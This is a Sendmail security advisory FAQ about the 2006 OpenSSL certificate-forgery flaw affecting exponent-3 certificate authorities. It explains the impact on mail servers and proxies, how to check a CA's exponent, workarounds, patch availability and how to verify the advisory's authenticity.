How was this issue discovered?
The OpenSSL Project recently released a security advisory
announcing that it was possible to forge certificates for certain
types of certificate authorities. More details regarding the
vulnerability can be found in their advisory, referenced at:
http://www.openssl.org/news/secadv_20060905.txt
How difficult would it be for someone to exploit this vulnerability?
It is not difficult because an exploit has already been posted to the
web.
Has anyone been impacted by this?
Sendmail has not received any reports from customers who have been
impacted by this issue. However, this information is now public and
there is a known published exploit.
What would happen if someone does exploit this?
The sendmail MTA and Sendmail Proxy server can optionally request and
validate an SSL certificate to identify the connecting client or server.
This validation is used to make policy decisions, such as whether to
accept the connection, allow relaying, digitally sign the message,
etc. Due to the OpenSSL bug, this validation can be subverted and the
attacker can bypass policy restrictions.
Note that this bug only affects sites using an exponent 3 certificate
authority. You can check the exponent type used with the command:
/usr/local/sendmail/smmta-8.13/sbin/openssl x509 -text -in cacert.pem | grep Exponent
Are sendmail MTAs behind my firewall vulnerable?
Only machines that accept SMTP, POPS, and IMAPS connections from the
outside world and machines that send SMTP to the outside world are
vulnerable, assuming they are doing certificate validation against an
exponent 3 certificate authority. Therefore, if your firewall operates
at the application level, you may be protected. Otherwise, your MTA is
not protected.
Has Sendmail had similar security issues in the past?
This security issue is a vulnerability in OpenSSL, which is used in
the Sendmail MTA. Previous to this issue Sendmail had a vulnerability
in certain versions of the Sendmail MTA in July of 2006. These
vulnerabilities were quickly addressed and resolved by Sendmail.
Although this type of occurrence is not uncommon in the industry,
Sendmail has established procedures to quickly and proactively respond
to security issues.
What are you doing to notify affected users?
Sendmail has notified all supported and unsupported customers who use
the affected Sendmail products. Additionally, Sendmail has posted
advisories on Sendmail's Website: http://www.sendmail.com/security/.
What should users do until they can install the patches?
If you are using an exponent 3 certificate authority and are unable
to install the patch immediately, you can work around this problem by
employing alternative methods of validating connections, such as SMTP
authentication for MTA related policy.
What should the users do to request the patches?
Sendmail is notifying our supported and unsupported customers about the
patches for specific product releases and platforms and providing the
information on how to download and obtain these patches or upgrades.
Customers do not need to specifically request patches. They may
download them directly from the ftp site given in the security advisory.
How important is this issue, how quickly should I plan to upgrade?
If you are using certificate verification with an exponent 3 certificate
authority, Sendmail's threat assessment of this issue is high. There is
already a known published exploit.
What are my options?
You may patch your system or configure your MTA to avoid the impacts.
See "What should users do until they can install the patches?" above for
more information.
Will this issue shut down my server?
No, this vulnerability will not shut down your server, but it may be
exploited to bypass security policies.
Will this issue cause me to lose mail?
No, this vulnerability will not cause you to lose mail.
Is this issue related to the recent security vulnerability in certain versions of sendmail Mail Transfer Agent?
No, this vulnerability is not related to the recent Sendmail MTA
security vulnerability.
What are all the new changes included in the Switch 3.1.11, Switch 3.2.5, Sentrion 1.5.5, and Proxy 2.2.3 patches?
1. Changes to the sendmail MTA binary to resolve this
vulnerability.
2. Changes to the POP/IMAP proxy binary to resolve this
vulnerability.
How can I verify this is a legitimate security advisory?
Customers can contact Sendmail Technical Support as listed on
/sm/contact/ to verify the authenticity of
this advisory. The email notification sent to Sendmail customers is
signed with PGP, using the Sendmail, Inc. Security Officer PGP key,
available at: http://www.sendmail.com/security/security-officer.asc.
In addition, a PGP signed copy is available for download at:
http://www.sendmail.com/security/, signed with the same key. |